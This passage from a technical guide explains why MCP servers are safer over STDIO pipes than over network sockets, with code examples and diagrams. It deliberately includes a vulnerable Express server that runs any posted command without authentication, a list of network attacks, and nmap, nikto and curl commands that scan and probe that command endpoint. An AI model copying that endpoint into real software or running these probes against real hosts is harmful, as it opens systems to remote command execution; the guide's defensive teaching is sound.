#### STDIO Mode Communication Path
```bash
# STDIO mode creates this isolated path:
Claude Code ──→ Process Fork ──→ OS Pipes ──→ MCP Server
│ │ │ │
Parent Process Child Process OS IPC Child Process
# NO network layers involved!
# Attacker has NO path to reach MCP Server
```
### Inter-Process Communication (IPC) vs Network Protocols
#### IPC Mechanisms (Local by Design)
**STDIO pipes are one form of IPC. These mechanisms only connect processes on the same machine:**
```c
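// Simplified view of STDIO pipe creation (one direction shown)
#include <stdio.h>
#include <unistd.h>
int main(void) {
    int pipe_fd[2];
    char buffer[16] = {0};
    if (pipe(pipe_fd) == -1) return 1; // One-way pipe: [0] is the read end, [1] the write end
    if (fork() == 0) { // Child (MCP Server) reads from the pipe
        read(pipe_fd[0], buffer, 10);
        printf("child received: %s\n", buffer);
        return 0;
    }
    // Parent (Claude Code) writes to the pipe
    write(pipe_fd[1], "get status", 10);
    // No socket is created, so network tools never see this traffic.
    // A real stdio transport uses two such pipes, one per direction.
    return 0;
}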
```
**Other IPC Mechanisms (all local; access is governed by OS permissions rather than network controls):**
- **Pipes** (STDIO mode uses these)
- **Named pipes (FIFOs)** - Filesystem-based pipes, protected by file permissions
- **Unix domain sockets** - Local socket files, protected by file permissions
- **Shared memory** - Direct memory sharing
- **Message queues** - OS-managed message passing
- **Semaphores** - Process synchronization
#### Network Protocols (Can Be Remote, Dangerous)
**Network sockets are designed for remote access:**
```c
// Network socket creation (dangerous for MCP)
int sock = socket(AF_INET, SOCK_STREAM, 0); // Internet socket
struct sockaddr_in addr = {
.sin_family = AF_INET,
.sin_port = htons(3000),
.sin_addr.s_addr = INADDR_ANY // 0.0.0.0 - ALL interfaces!
};
bind(sock, (struct sockaddr*)&addr, sizeof(addr));
listen(sock, 5); // Ready to accept connections
// This socket can accept connections from:
// - localhost (127.0.0.1)
// - Local network (192.168.x.x)
// - Internet (any public IP)
// - Docker containers
// - VPN connections
```
### Process Isolation Model (STDIO)
STDIO mode creates strong process isolation enforced by the operating system:
```bash
┌──────────────────┐ Pipes ┌──────────────────┐
│ Claude Code │◄──────────►│ MCP Server │
│ (Parent) │ │ (Child) │
│ PID: 1234 │ │ PID: 1235 │
│ User: alice │ │ User: alice │
└──────────────────┘ └──────────────────┘
▲ ▲
│ │
│ OS Process Management │
┌────▼────────────────────────────────▼────┐
│ Operating System Kernel │
│ • Enforces process boundaries │
│ • Manages pipe permissions │
│ • Prevents external access │
│ • Cleans up on process death │
└─────────────────────────────────────────┘
```
### Security Properties of Each Approach
#### STDIO Mode Security Properties
```bash
✅ Process Isolation: Communication only between parent/child
✅ No Network Exposure: Cannot be reached from network
✅ Automatic Cleanup: Child sees EOF on stdin when the parent exits and normally shuts down
✅ OS Access Control: Kernel enforces permissions
✅ No Port Scanning: Invisible to network discovery
✅ No Remote Access: No listening socket for a remote client to reach
✅ Firewall Irrelevant: No network traffic to filter
✅ No Authentication: Not needed - process isolation provides security
```
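
The cleanup property depends on the child noticing that its stdin has closed. The sketch below demonstrates that with a stand-in child process (a one-line Python echo loop, not a real MCP server): the parent sends one line, reads the reply, closes the pipe, and the child exits on end-of-file.

```python
import subprocess
import sys

# Stand-in child: echoes each stdin line in upper case until stdin closes.
CHILD_CODE = (
    "import sys\n"
    "for line in sys.stdin:\n"
    "    print(line.strip().upper(), flush=True)\n"
)

child = subprocess.Popen(
    [sys.executable, "-c", CHILD_CODE],
    stdin=subprocess.PIPE, stdout=subprocess.PIPE, text=True,
)
child.stdin.write("get status\n")
child.stdin.flush()
reply = child.stdout.readline().strip()

child.stdin.close()                 # the child now sees end-of-file on stdin
exit_code = child.wait(timeout=10)  # and leaves its read loop
child.stdout.close()
print(reply, exit_code)             # GET STATUS 0
```

A server that ignores end-of-file on stdin would keep running, so this behaviour is a convention that well-behaved stdio servers follow rather than something the kernel guarantees.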
#### Network Mode Security Weaknesses
```bash
❌ Network Exposure: Accessible from network interfaces
❌ Port Discovery: Can be found via port scanning
❌ Authentication Gap: Often lacks proper auth mechanisms
❌ Firewall Dependency: Security depends on external firewall config
❌ Protocol Attacks: Vulnerable to HTTP/TCP-level attacks
❌ Remote Accessibility: Can be reached from internet if misconfigured
❌ Persistent Service: Continues running independently
❌ Multi-layer Risk: Attack surface across all OSI layers
```
### Practical Code Examples
#### STDIO Mode Implementation (Secure)
**Programming Language Note**: *The following example is written in **JavaScript** for the **Node.js** runtime environment. Node.js is a JavaScript runtime that allows JavaScript to run on servers and desktops (not just in web browsers). It provides APIs for system operations like spawning processes and file management.*
```javascript
// How Claude Code securely spawns MCP server via STDIO
const { spawn } = require('child_process');
// Spawn child process with stdio pipes
const mcpServer = spawn('npx', ['@modelcontextprotocol/server-memory'], {
stdio: ['pipe', 'pipe', 'pipe'] // stdin, stdout, stderr pipes
});
// Secure communication via pipes
mcpServer.stdin.write(JSON.stringify({
method: "get_status",
id: 1
}) + '\n');
// Receive response via stdout pipe
// (assumes each chunk holds exactly one complete JSON message;
// production code should buffer and split on newlines)
mcpServer.stdout.on('data', (data) => {
const response = JSON.parse(data.toString());
console.log('Secure response:', response);
});
// The child sees EOF on stdin when Claude Code exits and normally shuts down
// NO NETWORK INVOLVEMENT AT ANY LEVEL
// Unrelated processes have no handle on this communication channel
```
**Code Explanation for Non-JavaScript Readers:**
```javascript
// Line-by-line breakdown:
// 1. Import Node.js module for creating child processes
const { spawn } = require('child_process');
// ↑ Destructuring assignment (extracts 'spawn' function)
// ↑ CommonJS module import (Node.js style)
// 2. Create a new child process running the MCP server
const mcpServer = spawn('npx', ['@modelcontextprotocol/server-memory'], {
// ↑ Variable to hold process reference
// ↑ Command to run ('npx' - Node package executor)
// ↑ Arguments passed to the command
stdio: ['pipe', 'pipe', 'pipe'] // Configure input/output streams
// ↑ stdin ↑ stdout ↑ stderr (standard streams)
});
// 3. Send data TO the child process via its input stream
mcpServer.stdin.write(JSON.stringify({
// ↑ stdin = standard input (pipe TO child)
// ↑ Convert JavaScript object to JSON string
method: "get_status", // JavaScript object with method name
id: 1 // and request ID
}) + '\n'); // Add newline character (message delimiter)
// 4. Listen FOR data FROM the child process via its output stream
mcpServer.stdout.on('data', (data) => {
// ↑ stdout = standard output (pipe FROM child)
// ↑ Event listener pattern
// ↑ Arrow function (ES6 syntax)
const response = JSON.parse(data.toString());
// ↑ Convert received bytes to string, then parse JSON
console.log('Secure response:', response);
// ↑ Print to console (like printf, print, echo in other languages)
});
```
**Key JavaScript/Node.js Concepts:**
1. **`require()`**: Node.js way to import modules (like `import` in Python or `#include` in C)
2. **`const`**: Declares a binding that cannot be reassigned (the object it refers to can still be mutated)
3. **`spawn()`**: Node.js function to create child processes
4. **`stdio`**: Configuration for Standard Input/Output streams
5. **`.write()`**: Method to send data through a pipe
6. **`.on()`**: Event listener pattern (similar to callbacks)
7. **Arrow functions `=>`**: Modern JavaScript function syntax
8. **`JSON.stringify()`/`JSON.parse()`**: Convert between objects and JSON strings
**Equivalent Concepts in Other Languages:**
```python
# Python equivalent (conceptual)
import subprocess
import json
# Spawn child process with pipes
process = subprocess.Popen(
['npx', '@modelcontextprotocol/server-memory'],
stdin=subprocess.PIPE,
stdout=subprocess.PIPE,
stderr=subprocess.PIPE
)
# Send data to child
request = json.dumps({"method": "get_status", "id": 1}) + "\n"
process.stdin.write(request.encode())
process.stdin.flush()  # The pipe is buffered; flush so the child actually receives the request
# Read response from child
response_data = process.stdout.readline()
response = json.loads(response_data.decode())
print("Secure response:", response)
```
```bash
# Bash equivalent (conceptual)
# Pipe one request into the server's stdin; the response arrives on its stdout
echo '{"method": "get_status", "id": 1}' | npx @modelcontextprotocol/server-memory
# The shell creates the pipe and closes it when echo finishes
```
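The newline delimiter in the examples above matters because a pipe delivers bytes in arbitrary chunks: one read may contain half a message or several messages at once. The following is a minimal sketch of newline-delimited JSON framing; the `LineFramer` class and its `feed` method are hypothetical names used for illustration, not part of any MCP library.

```python
import json


class LineFramer:
    """Accumulates raw chunks and returns one parsed JSON message per newline."""

    def __init__(self):
        self._buffer = b""

    def feed(self, chunk: bytes) -> list:
        """Add a chunk; return every complete message it finishes."""
        self._buffer += chunk
        messages = []
        while b"\n" in self._buffer:
            line, self._buffer = self._buffer.split(b"\n", 1)
            if line.strip():  # Skip blank lines
                messages.append(json.loads(line.decode("utf-8")))
        return messages


framer = LineFramer()
# One message split across two chunks, followed by a second whole message
first = framer.feed(b'{"id": 1, "res')
second = framer.feed(b'ult": "ok"}\n{"id": 2, "result": "done"}\n')
print(first)
print(second)
```

The first call returns an empty list because no newline has arrived yet; the second call completes the first message and also yields the one that follows it.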
**Why This Code is Secure:**
- **No network ports**: Uses process pipes, not TCP/UDP sockets
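- **Process isolation**: Only processes holding the pipe's file descriptors (normally just the parent and child) can use it
- **Coupled lifecycle**: When the parent exits, the child's stdin closes, and a well-behaved server exits on end-of-file
- **OS-level protection**: The kernel, not application code, enforces access to the pipe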
- **No external visibility**: Cannot be discovered by network tools
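
The request/response exchange and the lifecycle coupling described above can be observed with a small experiment. This is a sketch under stated assumptions: the child below is a hypothetical stand-in that answers every JSON line with a fixed result, not a real MCP server, and `get_status` is the same illustrative method name used earlier.

```python
import json
import subprocess
import sys

# Hypothetical stand-in for an MCP server: answers each JSON line with a status
CHILD_SOURCE = r'''
import json, sys
for line in sys.stdin:
    request = json.loads(line)
    print(json.dumps({"id": request["id"], "result": "ok"}), flush=True)
'''

child = subprocess.Popen(
    [sys.executable, "-c", CHILD_SOURCE],
    stdin=subprocess.PIPE,
    stdout=subprocess.PIPE,
)

# Request/response over the pipes; no socket is opened at any point
child.stdin.write((json.dumps({"method": "get_status", "id": 1}) + "\n").encode())
child.stdin.flush()
response = json.loads(child.stdout.readline().decode())

# Closing stdin delivers end-of-file; the child's read loop ends and it exits
child.stdin.close()
exit_code = child.wait(timeout=10)
child.stdout.close()
print(response, exit_code)
```

Note that the exit happens because the child chooses to stop at end-of-file. A server that ignores EOF would keep running, so the cleanup is a convention that well-behaved servers follow rather than a guarantee from the operating system.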
#### Network Mode Implementation (Vulnerable)
```javascript
// Dangerous network-based MCP server
const express = require('express');
const { exec } = require('child_process');
const app = express();
app.use(express.json());
// DANGEROUS: Command execution endpoint
app.post('/execute', (req, res) => {
const { command } = req.body;
// NO INPUT VALIDATION
// NO AUTHENTICATION
// NO RATE LIMITING
exec(command, (error, stdout, stderr) => {
res.json({
output: stdout,
error: stderr
});
});
});
// EXPOSES TO ALL NETWORK INTERFACES
app.listen(3000, '0.0.0.0', () => {
console.log('MCP server exposed on port 3000');
// Attack vectors now available:
// - Same machine: curl localhost:3000
// - Local network: curl 192.168.1.100:3000
// - Internet: curl your-public-ip:3000
// - Container networks: curl container-ip:3000
});
```
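For contrast, here is a minimal sketch of the checks the endpoint above is missing: authentication and dispatch to a fixed set of named actions instead of a shell. The token value, the action names, and the `handle_request` function are all hypothetical and chosen for illustration; a real deployment would also bind to `127.0.0.1` rather than `0.0.0.0` and add rate limiting.

```python
import hmac

# Hypothetical values for illustration only
EXPECTED_TOKEN = "replace-with-a-random-secret"
ALLOWED_ACTIONS = {
    "get_status": lambda: {"status": "ok"},
    "list_tools": lambda: {"tools": ["parse", "search"]},
}


def handle_request(token: str, action: str) -> dict:
    """Authenticate, then dispatch only to a fixed set of named actions."""
    # Constant-time comparison avoids leaking the token through timing
    if not hmac.compare_digest(token.encode(), EXPECTED_TOKEN.encode()):
        return {"error": "unauthorized"}
    handler = ALLOWED_ACTIONS.get(action)
    if handler is None:
        # Unknown names are rejected; nothing is ever passed to a shell
        return {"error": "unknown action"}
    return {"result": handler()}


unauthorized = handle_request("wrong", "get_status")
rejected = handle_request(EXPECTED_TOKEN, "rm -rf /")
accepted = handle_request(EXPECTED_TOKEN, "get_status")
print(unauthorized, rejected, accepted)
```

Because the caller can only select an action by name, there is no string for an attacker to inject into a command line.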
### Attack Surface Analysis by OSI Layer
#### Network Mode - Vulnerabilities at Each Layer
```bash
# Layer 7 (Application):
- Command injection via HTTP POST
- Authentication bypass
- Input validation failures
- Protocol confusion attacks
# Layer 6 (Presentation):
- JSON parsing vulnerabilities
- Encoding manipulation
- Data format attacks
# Layer 5 (Session):
- Session hijacking
- Connection state attacks
- Keep-alive exploitation
# Layer 4 (Transport):
- TCP port scanning
- Connection flooding (DoS)
- Sequence number attacks
- Port exhaustion
# Layer 3 (Network):
- IP address spoofing
- Routing table attacks
- Man-in-the-middle attacks
- Network reconnaissance
# Layer 2 (Data Link):
- ARP cache poisoning
- MAC address spoofing
- Switch flooding attacks
# Layer 1 (Physical):
- Network cable tapping
- WiFi interception
- Network infrastructure attacks
```
#### STDIO Mode - Zero Network Attack Surface
```bash
# Operating System Level:
✅ Process isolation prevents external access
✅ Pipe permissions enforced by kernel
✅ No network protocols involved
✅ Cannot be discovered by network scanning
✅ Server normally exits when the parent closes the pipes
# The main remaining attack vector:
- Compromise of the parent process (Claude Code) or another local process running as the same user
- But this doesn't create NEW network attack surface
- Parent process security is already critical
```
### Network Discovery and Scanning
#### How Network Mode Can Be Discovered
```bash
# Port scanning reveals network services
nmap -p 1-65535 target-ip
# Output shows: 3000/tcp open
# Service fingerprinting
nmap -sV -p 3000 target-ip
# May reveal: "Node.js Express framework"
# HTTP service enumeration
curl -v http://target-ip:3000
# Reveals endpoints and server information
# Automated vulnerability scanning
nikto -h http://target-ip:3000
# Direct probe of the command execution endpoint
curl -X POST -H "Content-Type: application/json" -d '{"command": "id"}' http://target-ip:3000/execute
```
#### STDIO Mode Is Invisible to Network Tools
```bash
# Port scanning shows nothing
nmap -p 1-65535 target-ip
# No additional open ports from MCP server
# Process scanning (requires local access)
ps aux | grep mcp
# Shows process but no network binding
# Network connection scanning
netstat -tulpn | grep mcp
ss -tulpn | grep mcp
# No network listeners from MCP server
```
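The difference between the two modes can also be checked programmatically. The sketch below assumes nothing about MCP itself: it opens a throwaway TCP listener on a loopback port chosen by the OS to stand in for a network-mode server, probes it, then closes it and probes again. The `is_port_open` helper is a hypothetical name.

```python
import socket


def is_port_open(host: str, port: int, timeout: float = 1.0) -> bool:
    """Return True if a TCP connection to host:port succeeds."""
    with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as probe:
        probe.settimeout(timeout)
        return probe.connect_ex((host, port)) == 0


# Simulate "network mode": a listener on a loopback port chosen by the OS
listener = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
listener.bind(("127.0.0.1", 0))
listener.listen(1)
port = listener.getsockname()[1]
open_while_listening = is_port_open("127.0.0.1", port)

# After the listener closes, nothing answers on that port
listener.close()
open_after_close = is_port_open("127.0.0.1", port)
print(open_while_listening, open_after_close)
```

A STDIO server never reaches the first state: with no listener, every probe behaves like the second call.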
### Real-World Analogy
#### Network Mode = Public Payphone
```
Your Network MCP Server ≈ Public payphone on busy street
Characteristics:
❌ Anyone can walk up and use it
❌ No authentication required to access
❌ Accessible 24/7 from public area
❌ Can be discovered by scanning the area
❌ Vulnerable to physical tampering
❌ Conversations can be overheard
❌ Location is publicly known
```
#### STDIO Mode = Private Intercom System
```
Your STDIO MCP Server ≈ Private intercom between two secured rooms
Characteristics:
✅ Only connected rooms can communicate
✅ No external access possible
✅ Cannot be discovered from outside
✅ Automatic disconnection when rooms close
✅ Private channel that never leaves the building
✅ No public presence or discoverability
✅ Dies when building is vacated
```
### Performance Comparison
#### STDIO Mode Performance Benefits
```bash
# Communication path:
Application → System Call → Kernel → Pipes → Target Process
# Advantages:
✅ No network stack overhead
✅ No TCP/IP processing
✅ No packet framing, HTTP parsing, or checksums (messages are still JSON-serialized)
✅ Data moves through a single in-kernel pipe buffer
✅ Kernel-optimized pipe performance
✅ No network latency or jitter
```
#### Network Mode Performance Overhead
```bash
# Communication path:
Application → System Call → Kernel → Network Stack →
Network Interface → Physical Network → ... → Target Process
# (Loopback connections skip the interface and physical network but still traverse the TCP/IP stack)
# Disadvantages:
❌ Full network stack processing required
❌ TCP/IP overhead (headers, checksums, etc.)
❌ HTTP framing and parsing overhead
❌ Potential network latency and jitter
❌ Additional memory copies through network buffers
❌ Network interface driver overhead
```
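One way to check these claims on your own machine is a rough micro-benchmark. The sketch below pushes the same small message through an anonymous pipe and through a loopback TCP connection; the payload and round count are arbitrary choices, and the numbers depend heavily on the OS and hardware, so treat the result as indicative only.

```python
import os
import socket
import time

PAYLOAD = b'{"method": "get_status", "id": 1}\n'
ROUNDS = 2000


def time_pipe() -> float:
    """Seconds to push PAYLOAD through an anonymous pipe ROUNDS times."""
    read_fd, write_fd = os.pipe()
    start = time.perf_counter()
    for _ in range(ROUNDS):
        os.write(write_fd, PAYLOAD)
        os.read(read_fd, len(PAYLOAD))
    elapsed = time.perf_counter() - start
    os.close(read_fd)
    os.close(write_fd)
    return elapsed


def time_tcp_loopback() -> float:
    """Seconds to push PAYLOAD through a loopback TCP connection ROUNDS times."""
    server = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    server.bind(("127.0.0.1", 0))
    server.listen(1)
    sender = socket.create_connection(server.getsockname())
    receiver, _ = server.accept()
    start = time.perf_counter()
    for _ in range(ROUNDS):
        sender.sendall(PAYLOAD)
        received = 0
        while received < len(PAYLOAD):  # recv may return a partial message
            received += len(receiver.recv(len(PAYLOAD) - received))
    elapsed = time.perf_counter() - start
    for sock in (sender, receiver, server):
        sock.close()
    return elapsed


pipe_seconds = time_pipe()
tcp_seconds = time_tcp_loopback()
print(f"pipe: {pipe_seconds:.4f}s  tcp loopback: {tcp_seconds:.4f}s")
```

Both transfers stay inside one process here, so the measurement isolates transport cost and ignores scheduling between a real parent and child.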
### Key Architectural Principle
**The fundamental security principle is**:
> **"If communication doesn't need to cross machine boundaries, don't use protocols designed for that purpose."**
This means:
- Use **IPC mechanisms** (pipes, domain sockets) for local communication
- Use **network protocols** only when actually communicating across networks
- **Default to the most restrictive communication mechanism** that meets your needs
- **Network exposure should be explicit and intentional**, never accidental
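
As a small illustration of choosing the most restrictive mechanism, the sketch below uses Python's `socket.socketpair()`. On POSIX systems (an assumption; Windows emulates this differently) it returns two already-connected Unix domain endpoints that have no address, so there is nothing for another machine to connect to or scan. The message contents are the same illustrative `get_status` exchange used earlier.

```python
import socket

# Two already-connected endpoints with no address to bind, advertise, or scan
parent_end, child_end = socket.socketpair()

parent_end.sendall(b'{"method": "get_status", "id": 1}\n')
request = child_end.recv(1024)
child_end.sendall(b'{"id": 1, "result": "ok"}\n')
reply = parent_end.recv(1024)

parent_end.close()
child_end.close()
print(request, reply)
```

Switching this exchange to TCP would require picking a host and port, which is exactly the explicit, intentional step the principle asks for.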
### Why "Local IPC Suffices" for MCP
MCP (Model Context Protocol) communication with a local server typically involves:
1. **Same-machine processes**: Claude Code and the MCP server run on the same computer
2. **Parent-child relationship**: Claude Code spawns and manages the MCP server
3. **Request-response pattern**: Simple command/response communication
4. **No remote access needed**: Nothing outside the machine has a legitimate reason to reach the server
5. **Process lifecycle coupling**: The MCP server should exit when Claude Code exits
**Local IPC** (specifically STDIO pipes) meets all of these requirements. In this setup, **network protocols** add no capability the client needs while exposing the server to the network attacks described above.
### The Bottom Line
**STDIO mode eliminates the network attack surface entirely by bypassing the network stack.** Instead of using protocols designed for internet communication, it uses OS-level process communication that cannot be reached from another machine.
This is why the security guidance consistently recommends STDIO mode: **it's not just "more secure"; with no listening socket, entire categories of network attacks have nothing to target.**
## Key Takeaways
### Semtools
- Powerful combination of AI-powered document parsing and semantic search
- Requires proper API configuration but provides excellent text extraction
- Semantic search finds contextually relevant content beyond keyword matching
- Outputs are well-structured and preserve document formatting
### MCP Security
- Terminal access should be avoided or heavily restricted
- Multiple layers of security are essential
- STDIO mode is safer than network mode for local servers
- Always apply principle of least privilege
- Structured APIs are preferable to raw command execution
## Resources
- **LlamaParse API**: https://api.cloud.llamaindex.ai
- **Semtools**: Installed via `cargo install semtools`
- **MCP Documentation**: Model Context Protocol specifications
- **Security Best Practices**: Container isolation, permission controls, audit logging
---
*Document created: 2025-09-06*
*Tools tested: semtools v1.2.1, Rust 1.89.0*